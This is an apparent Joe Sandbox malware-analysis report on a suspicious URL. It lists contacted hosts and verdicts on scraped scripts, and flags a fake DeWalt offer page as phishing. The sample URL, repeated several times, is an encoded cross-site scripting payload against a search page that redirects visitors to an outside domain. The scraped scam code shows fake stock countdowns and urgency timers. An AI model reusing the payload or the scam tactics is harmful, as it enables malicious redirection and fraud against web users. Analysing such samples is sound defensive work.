                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    use.fontawesome.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      s4wemepl3v-dsn.algolia.net
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        www.ibisworld.com
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          px.ads.linkedin.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            secure.detailsinventivegroup.com
                                                                            unknown
                                                                            unknownfalse
                                                                              unknown
                                                                              br.xn846.com
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                snap.licdn.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                  https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48true
                                                                                    unknown
                                                                                    https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25%32%37%25%32%43%25%32%37%25%32%46%25%32%37%25%32%43%25%32%3713%25%32%46139%25%32%448761%25%32%46964%25%32%4418418%25%32%4415995%25%32%37%25%35%44%25%35%42%25%32%37%25%36%41%25%36%46%25%36%39%25%36%45%25%32%37%25%35%44%25%32%38%25%32%37%25%32%37%25%32%39%25%32%39%25%32%43%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%35%42%25%32%37%25%36%32%25%36%46%25%36%34%25%37%39%25%32%37%25%35%44%25%35%42%25%32%37%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%37%25%35%44%25%35%42%25%32%37%25%36%46%25%37%30%25%36%31%25%36%33%25%36%39%25%37%34%25%37%39%25%32%37%25%35%44%25%33%44%25%33%30%25%37%38%25%33%30%25%33%42%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%30false
                                                                                      high
                                                                                      https://qwartiqpin.online/18caf37202bc2f9e1f8ae9200756c7acfalse
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        34.117.186.192
                                                                                        ipinfo.ioUnited States
                                                                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                        49.12.134.254
                                                                                        go-g3t-msg.comGermany
                                                                                        24940HETZNER-ASDEfalse
                                                                                        54.149.238.59
                                                                                        unknownUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        172.67.205.30
                                                                                        trk-amropode.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        44.242.83.217
                                                                                        alb-retail-us-1014447198.us-west-2.elb.amazonaws.comUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        104.22.65.78
                                                                                        sc.ec424.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        142.250.176.206
                                                                                        android.l.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        185.147.127.178
                                                                                        imputeletter.comRussian Federation
                                                                                        20655E-STYLEISP-ASRUfalse
                                                                                        52.214.78.235
                                                                                        log.cookieyes.comUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        142.251.40.168
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.64.99
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.251.40.131
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        46.229.160.76
                                                                                        br.geo.xn846.comNetherlands
                                                                                        39572ADVANCEDHOSTERS-ASNLfalse
                                                                                        142.251.32.106
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        157.90.1.66
                                                                                        cdn4image.comUnited States
                                                                                        766REDIRISRedIRISAutonomousSystemESfalse
                                                                                        172.67.20.8
                                                                                        cdn-cookieyes.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        167.71.30.39
                                                                                        unisonroad.comUnited States
                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                        108.138.106.116
                                                                                        cdn.matomo.cloudUnited States
                                                                                        16509AMAZON-02USfalse
                                                                                        172.67.177.226
                                                                                        subscription.trk-adulvion.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        23.221.239.209
                                                                                        unknownUnited States
                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                        172.217.165.131
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.21.22.140
                                                                                        extension.trk-amropode.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.1.229
                                                                                        jsdelivr.map.fastly.netUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        1.1.1.1
                                                                                        unknownAustralia
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        172.217.165.138
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.80.100
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.251.16.188
                                                                                        mobile-gtalk.l.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.67.171.114
                                                                                        pushclk.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.21.61.98
                                                                                        qwartiqpin.onlineUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        142.251.40.238
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        13.107.42.14
                                                                                        unknownUnited States
                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                        142.251.40.142
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.251.167.84
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.65.206
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        151.101.129.44
                                                                                        tls13.taboola.map.fastly.netUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        23.94.102.180
                                                                                        jadesglow.comUnited States
                                                                                        36352AS-COLOCROSSINGUSfalse
                                                                                        239.255.255.250
                                                                                        unknownReserved
                                                                                        unknownunknownfalse
                                                                                        151.101.65.44
                                                                                        unknownUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        104.21.27.152
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        52.146.86.174
                                                                                        unknownUnited States
                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                        172.67.156.232
                                                                                        www.electronixmaster.comUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        104.21.8.70
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        209.58.135.84
                                                                                        d47-usw-1.algolia.netUnited States
                                                                                        7203LEASEWEB-USA-SFO-12USfalse
                                                                                        104.21.80.104
                                                                                        event.trk-adulvion.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        34.149.120.191
                                                                                        www.nrj1hs34m.comUnited States
                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                        142.251.41.4
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.17.25.14
                                                                                        cdnjs.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        IP
                                                                                        192.168.2.16
                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                        Analysis ID:1437716
                                                                                        Start date and time:2024-05-07 20:40:48 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                        Sample URL:https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25%32%37%25%32%43%25%32%37%25%32%46%25%32%37%25%32%43%25%32%3713%25%32%46139%25%32%448761%25%32%46964%25%32%4418418%25%32%4415995%25%32%37%25%35%44%25%35%42%25%32%37%25%36%41%25%36%46%25%36%39%25%36%45%25%32%37%25%35%44%25%32%38%25%32%37%25%32%37%25%32%39%25%32%39%25%32%43%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%35%42%25%32%37%25%36%32%25%36%46%25%36%34%25%37%39%25%32%37%25%35%44%25%35%42%25%32%37%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%37%25%35%44%25%35%42%25%32%37%25%36%46%25%37%30%25%36%31%25%36%33%25%36%39%25%37%34%25%37%39%25%32%37%25%35%44%25%33%44%25%33%30%25%37%38%25%33%30%25%33%42%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%30
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:14
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • EGA enabled
                                                                                        Analysis Mode:stream
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal60.phis.win@18/121@78/389
                                                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 142.251.40.131, 142.251.40.142, 142.251.167.84, 34.104.35.123, 172.217.165.138, 52.146.86.174, 142.250.64.99
                                                                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, fonts.gstatic.com, clientservices.googleapis.com, ghochv3eng.trafficmanager.net, clients.l.google.com, www.gstatic.com, v3-use-appgwv2.eastus.cloudapp.azure.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • VT rate limit hit for: https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25
                                                                                        InputOutput
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        ```json
                                                                                        {
                                                                                          "obfuscated": false,
                                                                                          "injections": true,
                                                                                          "unpacking": false,
                                                                                          "antidebugger": false,
                                                                                          "reasons": "The code is not obfuscated as it uses clear variable and function names. It does modify the DOM tree by injecting elements and changing classes, so the 'injections' key is set to true. There is no evidence of code unpacking or anti-debugging techniques in use."
                                                                                        }
                                                                                        ```"
                                                                                        $('.amountInStock').append(' 5');
                                                                                                 setTimeout(function() {
                                                                                                   $('.amountInStock').empty();
                                                                                                   $('.amountInStock').append('<i class="fa fa-exclamation-circle"></i> 4');
                                                                                                   $('.stock h3').removeClass('greenText').addClass("orangeText");
                                                                                                   $('.stock h3').addClass('bounce-top');
                                                                                                 }, 7500);
                                                                                                 var animatePulsetwo = setInterval(removeBounce, 9000);
                                                                                                 
                                                                                                 function removeBounce() {
                                                                                                   $('.stock h3').removeClass('bounce-top');
                                                                                                 }
                                                                                                 
                                                                                                 setTimeout(function() {
                                                                                                   $('.amountInStock').empty();
                                                                                                   $('.amountInStock').append('<i class="fa fa-exclamation-circle"></i> 3');
                                                                                                   $('.stock h3').removeClass('orangeText').addClass("redText");
                                                                                                   $('.stock h3').addClass('bounce-top');
                                                                                                 }, 17000);
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        {
                                                                                          "obfuscated": false,
                                                                                          "injections": true,
                                                                                          "unpacking": false,
                                                                                          "antidebugger": false,
                                                                                          "reasons": "The code is not obfuscated as it uses clear variable names and follows a readable structure. However, it does modify the DOM tree by injecting content into the 'head', 'top', and 'bottom' sections of the HTML. There is no evidence of unpacking or anti-debugging techniques in the provided code."
                                                                                        }"
                                                                                        $(function(){
                                                                                        
                                                                                                        setTimeout(function(){
                                                                                                            $.get("/a/dewalt-tool-set/v1/ajax.php/extensions/checktrafficnew/place", function( data ) {
                                                                                                                if(data == null) return;
                                                                                                        
                                                                                                                if(typeof data == 'string') {
                                                                                                                    data = JSON.parse(data);
                                                                                                                }
                                                                                                        
                                                                                                                data.forEach(function(el) {
                                                                                                                    
                                                                                                                    if(el.type == 'head') {
                                                                                                                        $('head').append(el.content);
                                                                                                                    }
                                                                                            
                                                                                                                    if(el.type == 'top') {
                                                                                                                        $('body').prepend(el.content);
                                                                                                                    }
                                                                                            
                                                                                                                    if(el.type == 'bottom') {
                                                                                                                        $('body').append(el.content);
                                                                                                                    }
                                                                                                                });
                                                                                                            });
                                                                                                        }, 500);
                                                                                                        
                                                                                                    });
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        ```json
                                                                                        {
                                                                                          "obfuscated": false,
                                                                                          "injections": false,
                                                                                          "unpacking": false,
                                                                                          "antidebugger": false,
                                                                                          "reasons": "The provided code is not obfuscated and does not contain any signs of malicious behavior such as DOM manipulation or code unpacking. It appears to be a configuration object for a web application. However, it is still important to validate the integrity of the code by checking it against a known good version and ensuring that it is served over a secure connection."
                                                                                        }
                                                                                        ```"
                                                                                        AJAX_PATH="ajax.php/"; app_config={"valid_class":"no-error","error_class":"has-error","loading_class":"loading","exit_popup_enabled":false,"exit_popup_element_id":"","exit_popup_page":"","offer_path":"\/a\/dewalt-tool-set\/v1\/","current_step":1,"cbtoken":"1dd91d5bd0e393296f9b6c81fdcc1021","dev_mode":"N","show_validation_errors":"modal","allowed_tc":"8\"m0l0d0J050k050O0lv8sm\"l\"d1J152k253O3l484mvlsd\"J[r0j0V0H0q0h0k0R0X|Niraj,V4H1q2h2k3R3X4N4r|jiVaH]","allowed_country_codes":["US"],"countries":{"US":{"name":"United States","states":{"AL":{"name":"Alabama"},"AK":{"name":"Alaska"},"AS":{"name":"American Samoa"},"AZ":{"name":"Arizona"},"AR":{"name":"Arkansas"},"AE":{"name":"Armed Forces Middle East"},"AA":{"name":"Armed Forces Americas"},"AP":{"name":"Armed Forces Pacific"},"CA":{"name":"userfornia"},"CO":{"name":"Colorado"},"CT":{"name":"Connecticut"},"DE":{"name":"Delaware"},"DC":{"name":"District of Columbia"},"FM":{"name":"Federated States of Micronesia"},"FL":{"name":"Florida"},"GA":{"name":"Georgia"},"GU":{"name":"Guam"},"HI":{"name":"Hawaii"},"ID":{"name":"Idaho"},"IL":{"name":"Illinois"},"IN":{"name":"Indiana"},"IA":{"name":"Iowa"},"KS":{"name":"Kansas"},"KY":{"name":"Kentucky"},"LA":{"name":"Louisiana"},"ME":{"name":"Maine"},"MD":{"name":"Maryland"},"MA":{"name":"Massachusetts"},"MI":{"name":"Michigan"},"MN":{"name":"Minnesota"},"MS":{"name":"Mississippi"},"MO":{"name":"Missouri"},"MT":{"name":"Montana"},"NE":{"name":"Nebraska"},"NV":{"name":"Nevada"},"NH":{"name":"New Hampshire"},"NJ":{"name":"New Jersey"},"NM":{"name":"New Mexico"},"NY":{"name":"New York"},"NC":{"name":"North Carolina"},"ND":{"name":"North Dakota"},"MP":{"name":"Northern Mariana Islands"},"OH":{"name":"Ohio"},"OK":{"name":"Oklahoma"},"OR":{"name":"Oregon"},"PA":{"name":"Pennsylvania"},"PR":{"name":"Puerto Rico"},"MH":{"name":"Republic of Marshall Islands"},"RI":{"name":"Rhode Island"},"SC":{"name":"South Carolina"},"SD":{"name":"South Dakota"},"TN":{"name":"Tennessee"},"TX":{"name":"Texas"}
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        ```json
                                                                                        {
                                                                                          "obfuscated": false,
                                                                                          "injections": false,
                                                                                          "unpacking": false,
                                                                                          "antidebugger": false,
                                                                                          "reasons": "The provided JavaScript code is not obfuscated, does not modify the DOM tree, does not perform any unpacking operations, and does not contain any debugger evasion techniques. It is a simple self-invoking function that updates a timer on the page. The code is hosted on a legitimate-looking website, but the website's legitimacy should be verified separately."
                                                                                        }
                                                                                        ```"
                                                                                        (function () {
                                                                                                              const timer = document.getElementById('timer-container-12586003');
                                                                                                              const seconds = document.getElementById('timer-12586003').dataset.gjsSfTimerSeconds || 0;
                                                                                                              const endTime = Date.now() + (seconds * 1000);
                                                                                                              const refreshTimer = function () {
                                                                                                                  if (!timer) {
                                                                                                                      return;
                                                                                                                  }
                                                                                                                  const currentTime = Date.now();
                                                                                                                  const timeLeft = endTime - currentTime;
                                                                                                          
                                                                                                                  if (timeLeft > 0) {
                                                                                                                      const timeLeftInSeconds = Math.floor(timeLeft / 1000);
                                                                                                                      const minutesLeft = Math.floor(timeLeftInSeconds / 60);
                                                                                                                      const secondsLeft = timeLeftInSeconds % 60;
                                                                                                          
                                                                                                                      const minutesText = minutesLeft < 10 ? ('0' + minutesLeft) : minutesLeft;
                                                                                                                      const secondsText = secondsLeft < 10 ? ('0' + secondsLeft) : secondsLeft;
                                                                                                          
                                                                                                                      timer.innerText = minutesText + ':' + secondsText;
                                                                                                                  } else {
                                                                                                                      timer.innerText = '00:00';
                                                                                                                  }
                                                                                                              };
                                                                                                              refreshTimer();
                                                                                                              setInterval(refreshTimer, 999);
                                                                                                          })()
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        ```json
                                                                                        {
                                                                                          "obfuscated": false,
                                                                                          "injections": false,
                                                                                          "unpacking": false,
                                                                                          "antidebugger": false,
                                                                                          "reasons": "The provided code is not obfuscated and does not contain any malicious activities such as DOM manipulation or code unpacking. It is a simple JSON object that contains error messages and exceptions for a web application. The hosting URL does not seem to have any relation to the code provided. However, it is important to note that a thorough security audit should involve analyzing all the code and components of the web page, not just the provided JavaScript snippet."
                                                                                        }
                                                                                        ```"
                                                                                        app_lang={"error_messages":{"zip_invalid":"Please enter a valid zip code!","email_invalid":"Please enter a valid email id!","cc_invalid":"Please enter a valid credit card number!","cvv_invalid":"Please enter a valid CVV code!","card_expired":"Card seems to have expired already!","card_expire_soon":"Your credit card is about to expire, please update your card information.","common_error":"Oops! Something went wrong! Can you please retry?","not_checked":"Please check the agreement box in order to proceed.","ca_zip_invalid":"Invalid Canada state code","xv_invalid_shipping":"Your shipping address could not be verified","xv_email":"Your email address could not be verified","xv_phone":"Your phone number could not be verified"},"exceptions":{"config_error":"General config error","config_file_missing":"General config error","invalid_array":"Argument is not a valid array","empty_prospect_id":"Prospect ID is empty or invalid","curl_error":"Something went wrong with the request, Please try again.","generic_error":"Something went wrong with the request, Please try again."}};
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        ```json
                                                                                        {
                                                                                          "obfuscated": false,
                                                                                          "injections": false,
                                                                                          "unpacking": false,
                                                                                          "antidebugger": false,
                                                                                          "reasons": "The provided code is not obfuscated, does not modify the DOM tree, does not perform any code unpacking, and does not contain any debugging prevention techniques. It is a simple JSON object that defines some masking settings for input fields. The hosting URL does not seem to have any relation to the code itself, so it's difficult to make a definitive judgement about the legitimacy of the site based solely on this code snippet."
                                                                                        }
                                                                                        ```"
                                                                                        var input_mask_data = {"enable_masking":true,"masking_device":["desktop","mobile"],"credit_card_place_holder_active":false,"credit_card_masking_placeholder":"blank","credit_card_masking":"space_masking","phone_number_masking":"(000) 000-0000","enable_credit_Card_masking":true};
                                                                                        URL: https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48
                                                                                        ```json
                                                                                        {
                                                                                          "phishing_score": 7,
                                                                                          "brands": "Dewalt",
                                                                                          "phishing": true,
                                                                                          "suspicious_domain": true,
                                                                                          "has_loginform": true,
                                                                                          "has_captcha": false,
                                                                                          "setechniques": true,
                                                                                          "blank": false,
                                                                                          "reasons": "The URL 'https://www.electronixmaster.com/a/dewalt-tool-set/v1/?affId=18&c1=&c2=5zQE9PatAsgf&c3=&c4=&click_id=b6a6a7d2a54e469399a7d38f5c174c48' contains several red flags typical of phishing sites, including a complex and suspicious query string and an unfamiliar domain name that does not match the official Dewalt domain. The image shows a form requesting personal information, which is a common phishing tactic. The use of urgency ('This offer expires in') and limited stock indicators are social engineering techniques designed to rush the user into making a decision. The security badges displayed are often misused by phishing sites to create a false sense of security."
                                                                                        }
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue May 7 17:41:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2673
                                                                                        Entropy (8bit):3.9881754859117464
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:2A30E23C9499164E049358E8040561B5
                                                                                        SHA1:7693D098DF7C49722683F21E15C1940F34144BDA
                                                                                        SHA-256:47161860234FB2EEAEC827A58DB0C88CE0097748C7BCAAF681145895855C4424
                                                                                        SHA-512:900DFE7A17ABB7404537D54BFBA186D3CA358CE4452FAE70226E830B72C8E1F9E257F17B9C5FA150F23564EF834899B23853845BDF4AB1D20C180B186400C4D9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,....Px.&....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X .....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X).....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X).....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X)............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue May 7 17:41:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2675
                                                                                        Entropy (8bit):4.007690742569923
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4B075C54BE5A4AD06B610B752338909F
                                                                                        SHA1:BD6E4B6F3201490A922E0D1FF5E7771943C9250F
                                                                                        SHA-256:80934117C2C00EDE549973B0182F8F91E01E4C70AF25D495C1351B0482D5B49B
                                                                                        SHA-512:7A81DD46C1C145AC0C04B1EBE62B5DC5299D48429FFB65B9D77857598E9ACE9178127AD7252D1824B7A8855184D685D5A30183103B3974370A4FCA109A5C30CB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:L..................F.@.. ...$+.,.......&....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X .....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X).....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X).....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X)............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X*............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2689
